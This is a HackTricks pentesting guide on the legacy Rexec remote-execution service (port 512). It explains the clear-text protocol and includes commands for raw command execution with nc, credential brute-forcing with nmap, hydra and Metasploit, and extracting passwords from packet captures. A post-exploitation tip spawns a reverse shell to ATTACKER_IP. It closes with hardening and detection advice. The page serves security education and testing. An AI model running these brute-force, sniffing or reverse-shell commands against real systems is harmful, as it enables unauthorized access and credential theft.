512 - Pentesting Rexec

Reading time: 5 minutes

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

Rexec (remote exec) is one of the original Berkeley r-services suite (together with rlogin, rsh, …). It provides a remote command-execution capability authenticated only with a clear-text username and password. The protocol was defined in the early 1980’s (see RFC 1060) and is nowadays considered insecure by design. Nevertheless it is still enabled by default in some legacy UNIX / network-attached equipment and occasionally shows up during internal pentests.

Default Port: TCP 512 (exec)

PORT    STATE SERVICE
512/tcp open  exec

πŸ”₯ All traffic – including credentials – is transmitted unencrypted. Anyone with the ability to sniff the network can recover the username, password and command.

Protocol quick-look

  1. Client connects to TCP 512.
  2. Client sends three NUL-terminated strings:
    • the port number (as ASCII) where it wishes to receive stdout/stderr (often 0),
    • the username,
    • the password.
  3. A final NUL-terminated string with the command to execute is sent.
  4. The server replies with a single 8-bit status byte (0 = success, 1 = failure) followed by the command output.

That means you can reproduce the exchange with nothing more than echo -e and nc:

bash
(echo -ne "0\0user\0password\0id\0"; cat) | nc <target> 512

If the credentials are valid you will receive the output of id straight back on the same connection.

Manual usage with the client

Many Linux distributions still ship the legacy client inside the inetutils-rexec / rsh-client package:

bash
rexec -l user -p password <target> "uname -a"

If -p is omitted the client will prompt interactively for the password (visible on the wire in clear-text!).


Enumeration & Brute-forcing

Brute-force

Nmap

bash
nmap -p 512 --script rexec-info <target>
# Discover service banner and test for stdout port mis-configuration

nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.txt" <target>

The rexec-brute NSE uses the protocol described above to try credentials very quickly .

Hydra / Medusa / Ncrack

bash
hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8

hydra has a dedicated rexec module and remains the fastest offline bruteforcer . medusa (-M REXEC) and ncrack (rexec module) can be used in the same way.

Metasploit

use auxiliary/scanner/rservices/rexec_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

The module will spawn a shell on success and store the credentials in the database .


Sniffing credentials

Because everything is clear-text, network captures are priceless. With a copy of the traffic you can extract creds without touching the target:

bash
tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
  awk -F"\\0" '{print $2":"$3" -> "$4}'  # username:password -> command

(In Wireshark enable Decode As …​ TCP 512 β†’ REXEC to view nicely-parsed fields.)


Post-Exploitation tips

  • Commands run with the privileges of the supplied user. If /etc/pam.d/rexec is mis-configured (e.g. pam_rootok), root shells are sometimes possible.
  • Rexec ignores the user’s shell and executes the command via /bin/sh -c <cmd>. You can therefore use typical shell-escape tricks (;, $( ), backticks) to chain multiple commands or spawn reverse shells:
    rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
    
  • Passwords are often stored in ~/.netrc on other systems; if you compromise one host you may reuse them for lateral movement.

Hardening / Detection

  • Do not expose rexec; replace it with SSH. Virtually all modern inetd superservers comment the service out by default.
  • If you must keep it, restrict access with TCP wrappers (/etc/hosts.allow) or firewall rules and enforce strong per-account passwords.
  • Monitor for traffic to :512 and for rexecd process launches. A single packet capture is enough to detect a compromise.
  • Disable rexec, rlogin, rsh together – they share most of the same codebase and weaknesses.

References

tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks